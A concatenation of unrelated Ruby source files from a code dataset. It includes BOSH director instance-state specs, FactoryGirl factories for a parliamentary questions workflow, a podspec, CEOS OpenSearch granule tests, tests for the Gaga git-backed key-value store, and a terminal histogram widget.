status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['bootstrap']).to be_falsey
end
end
it 'should return processes info' do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
instance.update(spec: { 'vm_type' => { 'name' => 'fake-vm-type', 'cloud_properties' => {} } })
expect(agent).to receive(:get_state).with('full').and_return(
'vm_cid' => 'fake-vm-cid',
'networks' => { 'test' => { 'ip' => '1.1.1.1' } },
'agent_id' => 'fake-agent-id',
'index' => 0,
'job' => { 'name' => 'dea' },
'job_state' => 'running',
'processes' => [
{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' },
],
)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq(['1.1.1.1'])
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('running')
expect(status['vitals']).to be_nil
expect(status['processes']).to eq([{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' }])
end
context 'with exclude filter and instances without vms' do
it 'excludes those instances missing vms' do
allow(agent).to receive(:get_state).with('full').and_return(
'networks' => { 'test' => { 'ip' => '1.1.1.1' } },
)
expect(job.task_result).to receive(:write).once
job.perform
end
end
context 'when instance has multiple vms' do
let!(:inactive_vm) do
Models::Vm.make(instance: instance, active: false, agent_id: 'other_agent_id', cid: 'fake-vm-cid-2')
end
let(:lazy_agent) { instance_double('Bosh::Director::AgentClient') }
let(:lazy_agent_state) do
{
'vm_cid' => 'fake-vm-cid-2',
'networks' => { 'test' => { 'ip' => '1.1.1.1' } },
'agent_id' => 'other_agent_id',
'index' => 0,
'job' => { 'name' => 'dea' },
'job_state' => 'stopped',
'processes' => [
{ 'name' => 'fake-process-1', 'state' => 'stopped' },
{ 'name' => 'fake-process-2', 'state' => 'stopped' },
],
}
end
let(:agent_state) do
{
'vm_cid' => 'fake-vm-cid',
'networks' => { 'test' => { 'ip' => '1.1.1.2' } },
'agent_id' => 'fake-agent-id',
'index' => 0,
'job' => { 'name' => 'dea' },
'job_state' => 'running',
'processes' => [
{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' },
],
}
end
before do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
Models::IpAddress.make(
instance_id: instance.id,
vm_id: inactive_vm.id,
address_str: NetAddr::CIDR.create('1.1.1.2').to_i.to_s,
task_id: '12345',
)
allow(AgentClient).to receive(:with_agent_id).with('other_agent_id', anything, timeout: 5).and_return(lazy_agent)
allow(lazy_agent).to receive(:get_state).with('full').and_return(lazy_agent_state)
allow(agent).to receive(:get_state).with('full').and_return(agent_state)
instance.update(spec: { 'vm_type' => { 'name' => 'fake-vm-type', 'cloud_properties' => {} } })
end
context 'when getting vm states' do
it 'returns all vms, active and inactive' do
job.perform
results = Models::Task.first(id: task.id).result_output.split("\n")
expect(results.length).to eq(2)
results = results.map { |r| JSON.parse(r) }
results.sort_by! { |r| r['ips'][0] }
status = results[0]
expect(status['ips']).to eq(['1.1.1.1'])
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('running')
expect(status['vitals']).to be_nil
expect(status['processes']).to eq([{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' }])
status = results[1]
expect(status['ips']).to eq(['1.1.1.2'])
expect(status['vm_cid']).to eq('fake-vm-cid-2')
expect(status['active']).to eq(false)
expect(status['agent_id']).to eq('other_agent_id')
expect(status['job_state']).to eq('stopped')
expect(status['vitals']).to be_nil
expect(status['processes']).to eq([{ 'name' => 'fake-process-1', 'state' => 'stopped' },
{ 'name' => 'fake-process-2', 'state' => 'stopped' }])
end
end
context 'when getting instance states' do
let(:instance_details) { true }
it 'returns information from active vm' do
job.perform
results = Models::Task.first(id: task.id).result_output.split("\n")
expect(results.length).to eq(1)
status = JSON.parse(results[0])
expect(status['ips']).to eq(['1.1.1.1'])
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('running')
expect(status['vitals']).to be_nil
expect(status['processes']).to eq([{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' }])
end
end
end
end
end
end
| 37.139963 | 123 | 0.545297 |
d5f17bd26516ac311ea3d88f15c874cfd9b09e65 | 6,267 | # == Schema Information
#
# Table name: pqs
#
# id :integer not null, primary key
# house_id :integer
# raising_member_id :integer
# tabled_date :datetime
# response_due :datetime
# question :text
# answer :string(255)
# created_at :datetime
# updated_at :datetime
# finance_interest :boolean
# seen_by_finance :boolean default(FALSE)
# uin :string(255)
# member_name :string(255)
# member_constituency :string(255)
# house_name :string(255)
# date_for_answer :date
# registered_interest :boolean
# internal_deadline :datetime
# question_type :string(255)
# minister_id :integer
# policy_minister_id :integer
# progress_id :integer
# draft_answer_received :datetime
# i_will_write_estimate :datetime
# holding_reply :datetime
# preview_url :string(255)
# pod_waiting :datetime
# pod_query :datetime
# pod_clearance :datetime
# transferred :boolean
# question_status :string(255)
# round_robin :boolean
# round_robin_date :datetime
# i_will_write :boolean
# pq_correction_received :boolean
# correction_circulated_to_action_officer :datetime
# pod_query_flag :boolean
# sent_to_policy_minister :datetime
# policy_minister_query :boolean
# policy_minister_to_action_officer :datetime
# policy_minister_returned_by_action_officer :datetime
# resubmitted_to_policy_minister :datetime
# cleared_by_policy_minister :datetime
# sent_to_answering_minister :datetime
# answering_minister_query :boolean
# answering_minister_to_action_officer :datetime
# answering_minister_returned_by_action_officer :datetime
# resubmitted_to_answering_minister :datetime
# cleared_by_answering_minister :datetime
# answer_submitted :datetime
# library_deposit :boolean
# pq_withdrawn :datetime
# holding_reply_flag :boolean
# round_robin_guidance_received :datetime
# transfer_out_ogd_id :integer
# transfer_out_date :datetime
# directorate_id :integer
# original_division_id :integer
# transfer_in_ogd_id :integer
# transfer_in_date :datetime
# follow_up_to :string(255)
# state :string(255) default("unassigned")
# state_weight :integer default(0)
#
# Factories for parliamentary questions (PQs). Nested factories inherit
# from their parent and add the state/timestamps that mark progression
# through the PQ workflow (unassigned -> no_response -> draft_pending ->
# with_pod -> pod_cleared -> with_minister -> ... -> answered).
FactoryGirl.define do
  factory :pq do
    uin { Faker::Lorem.characters(10) }
    house_id 1
    raising_member_id 1
    tabled_date "2014-05-08 13:45:31"
    response_due "2014-05-08 13:45:31"
    question { Faker::Lorem.sentence(10) }
    answer nil
    state PQState::UNASSIGNED

    # PQ that finance has already reviewed (no finance interest flagged).
    factory :checked_by_finance_pq do
      finance_interest false

      # Allocated to an action officer but no draft response received yet.
      factory :not_responded_pq do
        state PQState::NO_RESPONSE
        internal_deadline { Faker::Date.forward(14) }
        date_for_answer { Faker::Date.between(internal_deadline, internal_deadline + 7.days)}
        minister

        # Transient attributes: which officer to allocate and when.
        ignore do
          action_officer { create(:action_officer) }
          action_officer_allocated_at { Time.now }
        end

        # Link the PQ to its action officer via the join model, back-dating
        # the join record to the allocation time.
        after(:create) do |pq, evaluator|
          create(:action_officers_pq,
                 pq: pq,
                 action_officer: evaluator.action_officer,
                 created_at: evaluator.action_officer_allocated_at,
                 updated_at: evaluator.action_officer_allocated_at)
        end
      end

      # Officer accepted the PQ; a draft answer is being prepared.
      factory :draft_pending_pq do
        state PQState::DRAFT_PENDING
        internal_deadline { Faker::Date.forward(14) }
        date_for_answer { Faker::Date.between(internal_deadline, internal_deadline + 7.days)}
        minister

        after(:create) do |pq, _|
          pq.action_officers_pqs = [create(:accepted_action_officers_pq, pq: pq)]
        end

        # Draft received; now with the Parliamentary Office of the Department (POD).
        factory :with_pod_pq do
          state PQState::WITH_POD
          draft_answer_received { Time.now }

          factory :pod_query_pq do
            state PQState::POD_QUERY
            pod_query_flag true

            factory :pod_cleared_pq do
              state PQState::POD_CLEARED
              pod_clearance { Time.now }

              # Cleared by POD and sent on to the answering minister.
              factory :with_minister_pq do
                state PQState::WITH_MINISTER
                sent_to_answering_minister { Time.now }

                factory :ministerial_query_pq do
                  state PQState::MINISTERIAL_QUERY
                  answering_minister_query true
                end

                factory :minister_cleared_pq do
                  state PQState::MINISTER_CLEARED
                  cleared_by_answering_minister { Time.now }
                end
              end
            end
          end
        end
      end
    end

    # Terminal state: the PQ has been answered.
    factory :answered_pq do
      state PQState::ANSWERED
    end
  end
end
| 41.503311 | 93 | 0.494016 |
1a8cb0b1ea3f1ac5039c7d804c3034bd16110d56 | 619 | Pod::Spec.new do |s|
s.name = "OpenClien"
s.version = "0.1.1"
s.summary = "Clien.net 비공식 iOS 라이브러리"
s.homepage = "https://github.com/kewlbear/OpenClien"
s.license = 'Apache 2.0'
s.author = { "Changbeom Ahn" => "[email protected]" }
s.source = { :git => "https://github.com/kewlbear/OpenClien.git", :tag => s.version.to_s }
s.platform = :ios, '7.0'
s.requires_arc = true
s.source_files = 'OpenClien', 'Vendor/GDataXML-HTML'
s.compiler_flags = '-I$(SDKROOT)/usr/include/libxml2'
s.dependency 'GTMNSStringHTMLAdditions'
end
| 36.411765 | 102 | 0.588045 |
011817fbc7d8713af3fa36dfa17c9298b7692d44 | 1,598 | require 'spec_helper'
describe 'granules searches compliance with CEOS Best Practices version 1.2' do
  include Rack::Test::Methods

  def app
    Rails.application
  end

  it 'unsupported query parameters are dropped from the request per CEOS-BP-009B' do
    VCR.use_cassette 'views/granule/ceos_bp_009b', :decode_compressed_response => true, :record => :once do
      get '/granules.atom?shortName=AST_L1B&unsupported_query_parameter=testvalue'
      assert last_response.ok?

      # Namespaces shared by every xpath lookup below.
      ns = { 'os' => 'http://a9.com/-/spec/opensearch/1.1/', 'atom' => 'http://www.w3.org/2005/Atom' }
      feed = Nokogiri::XML(last_response.body)

      # OpenSearch pagination metadata reflects the full result set.
      assert_equal '3172006', feed.xpath('atom:feed/os:totalResults', ns).first.text
      assert_equal '10', feed.xpath('atom:feed/os:itemsPerPage', ns).first.text
      assert_equal '1', feed.xpath('atom:feed/os:startIndex', ns).first.text

      # The echoed Query element keeps supported parameters and silently
      # drops the unsupported one, as CEOS-BP-009B requires.
      request_node = feed.xpath('atom:feed/os:Query', ns).first
      expect(request_node.keys.include?('role')).to be true
      expect(request_node.keys.include?('shortName')).to be true
      expect(request_node.keys.include?('unsupported_query_parameter')).to be false
      expect(request_node.values.include?('request')).to be true
      expect(request_node.values.include?('AST_L1B')).to be true
      expect(request_node.values.include?('testvalue')).to be false
    end
  end
end
| 57.071429 | 169 | 0.694618 |
03945d9bd2ca5d184545e3bcb55ffd9b0f56af2a | 5,670 | $:.unshift File.dirname(__FILE__)
require 'helper'
describe Gaga do
@types = {
"String" => ["lady", "gaga"],
"Object" => [{:lady => :gaga}, {:gaga => :ohai}]
}
before do
@store = Gaga.new(:repo => tmp_dir, :branch => :lady)
@master = Gaga.new(:repo => tmp_dir)
end
after do
remove_tmpdir!
end
@types.each do |type, (key, key2)|
it "writes String values to keys" do
@store[key] = "value"
@store[key].must_equal "value"
end
it "writes String values to keys with explicit custom log data" do
@store.set(key, "value", {:message => "Custom message", :author => {:name => 'Test', :email => '[email protected]'} })
@store[key].must_equal "value"
entry = @store.log(key).first
entry['message'].must_equal "Custom message"
entry['author'].must_equal({'name' => 'Test', 'email' => '[email protected]'})
end
it "writes String values to keys with global custom log data" do
store = Gaga.new(
:repo => tmp_dir,
:branch => :lady,
:author => {:name => 'Test', :email => '[email protected]'},
:committer => {:name => 'Test2', :email => '[email protected]'}
)
store.set(key, "value", {:message => "Custom message"})
store[key].must_equal "value"
entry = store.log(key).first
entry['message'].must_equal "Custom message"
entry['author'].must_equal({'name' => 'Test', 'email' => '[email protected]'})
entry['committer'].must_equal({'name' => 'Test2', 'email' => '[email protected]'})
end
it "does not create empty commit" do
grit = Grit::Repo.new(tmp_dir)
initial_count = grit.commit_count
@master.set(key, "value", {:message => 'First commit'})
@master.set(key, "value", {:message => 'Second commit'})
current_count = grit.commit_count
(current_count - initial_count).must_equal 1
@master[key].must_equal "value"
end
it "reads from keys" do
@store[key].must_be_nil
end
it "should default to master when no branch is specified" do
value = 'testing'
@master[key] = value
@master[key].must_equal value
@store[key].must_be_nil
tmp = Gaga.new(:repo => tmp_dir, :branch => :master)
tmp[key].must_equal value
end
it 'guarantess the key is stored in the right branch' do
@store[key] = 'value'
@master[key].must_be_nil
@store[key].must_equal "value"
end
it "returns a list of keys" do
@store[key] = "value"
@store.keys.must_include(key)
end
it "guarantees that a different String value is retrieved" do
value = "value"
@store[key] = value
@store[key].wont_be_same_as(value)
end
it "writes Object values to keys" do
@store[key] = {:foo => :bar}
@store[key].must_equal({:foo => :bar})
end
it "guarantees that a different Object value is retrieved" do
value = {:foo => :bar}
@store[key] = value
@store[key].wont_be_same_as(:foo => :bar)
end
it "returns false from key? if a key is not available" do
@store.key?(key).must_equal false
end
it "returns true from key? if a key is available" do
@store[key] = "value"
@store.key?(key).must_equal true
end
it "removes and return an element with a key from the store via delete if it exists" do
@store[key] = "value"
@store.delete(key).must_equal "value"
@store.key?(key).must_equal false
end
it "removes a key using a custom commit message" do
@store[key] = "value"
@store.delete(key, {:message => "Removed it"}).must_equal "value"
@store.key?(key).must_equal false
entry = @store.log(key).first
entry['message'].must_equal "Removed it"
end
it "returns nil from delete if an element for a key does not exist" do
@store.delete(key).must_be_nil
end
it "removes all keys from the store with clear" do
@store[key] = "value"
@store[key2] = "value2"
@store.clear
@store.key?(key).wont_equal true
@store.key?(key2).wont_equal true
end
it "removes all keys from the store with clear and custom commit message" do
@store[key] = "value"
@store[key2] = "value2"
@store.clear({:message => "All gone"})
@store.key?(key).wont_equal true
@store.key?(key2).wont_equal true
[key, key2].each do |k|
entry = @store.log(k).first
entry['message'].must_equal "All gone"
end
end
it "does not run the block if the #{type} key is available" do
@store[key] = "value"
unaltered = "unaltered"
@store.get(key) { unaltered = "altered" }
unaltered.must_equal "unaltered"
end
it "stores #{key} values with #set" do
@store.set(key, "value")
@store[key].must_equal "value"
end
it 'stores a log message for the key' do
@store[key] = "value"
@store.log(key).first['message'].must_equal("set '#{key}'")
end
end
it 'creates a bare repository' do
bare = Gaga.new(:repo => tmp_bare, :branch => :lady)
File.exists?(File.join(tmp_bare, '.git')).must_equal false
File.exists?(File.join(tmp_bare, 'refs')).must_equal true
bare['key1'] = 'Value 1'
bare['key2'] = 'Value 2'
bare['key3'] = 'Value 3'
bare['key1'].must_equal 'Value 1'
bare['key2'].must_equal 'Value 2'
bare.keys.must_equal %w(key1 key2 key3)
bare.delete('key1')
bare['key1'].must_be_nil
bare.clear
bare.keys.must_equal []
remove_tmpdir!(tmp_bare)
end
end
| 29.226804 | 123 | 0.592593 |
b944832acd6eeb76ef2bd2bcd26ebca38eaa9cec | 1,473 | module RETerm
module Components
# CDK Histogram Widget
class Histogram < Component
include CDKComponent
attr_accessor :value
# Override setter
def value=(v)
component.set(:PERCENT, # view type
CDK::CENTER, # stats pos
Ncurses::A_BOLD, # stats attr
@min, @max, v, # low/high/current
' '.ord | Ncurses::A_REVERSE, # fill ch
true) # box
window.cdk_scr.refresh
end
# Initialize the Histogram component
#
# @param [Hash] args label params
# @option args [String] :title title of Histogram
# @option args [Integer] :min min histogram value
# @option args [Integer] :max max histogram value
def initialize(args={})
super
@title = args[:title] || ""
@min = args[:min] || 0
@max = args[:max] || 10
end
def requested_rows
4
end
def requested_cols
50
end
private
def _component
CDK::HISTOGRAM.new(window.cdk_scr,
2, 1, # x, y
1, -2, # h, w
CDK::HORIZONTAL, # orient
@title,
true, false) # box, shadow
end
end # Histogram
end # module Components
end # module RETerm
| 26.303571 | 61 | 0.467753 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.